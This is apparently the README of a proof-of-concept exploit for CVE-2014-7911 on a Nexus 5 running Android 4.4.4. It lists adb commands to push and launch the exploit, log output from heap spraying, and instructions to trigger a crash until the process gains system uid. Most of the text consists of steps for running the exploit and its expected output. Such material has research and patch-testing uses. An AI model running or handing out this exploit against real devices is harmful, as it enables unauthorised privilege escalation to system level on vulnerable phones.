POC for CVE-2014-7911 for Nexus5 Android 4.4.4_r1 based on retme7, use different rop chain
connect your phone via adb
adb push jni/expolit /data/local/tmp
adb logcat | grep auo_
lunch this poc, click the “CVE-2014-7911” button, you will see:
D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900
Then minimize activity several times until the system crashes, if you see:
D/auo_exploit(22665): uid=1000(system) gid=1000(system)
the exploit has succeeded, if your phone just crashes, your device is vulnerable the exploit may have failed(you should find diffent ROP chains).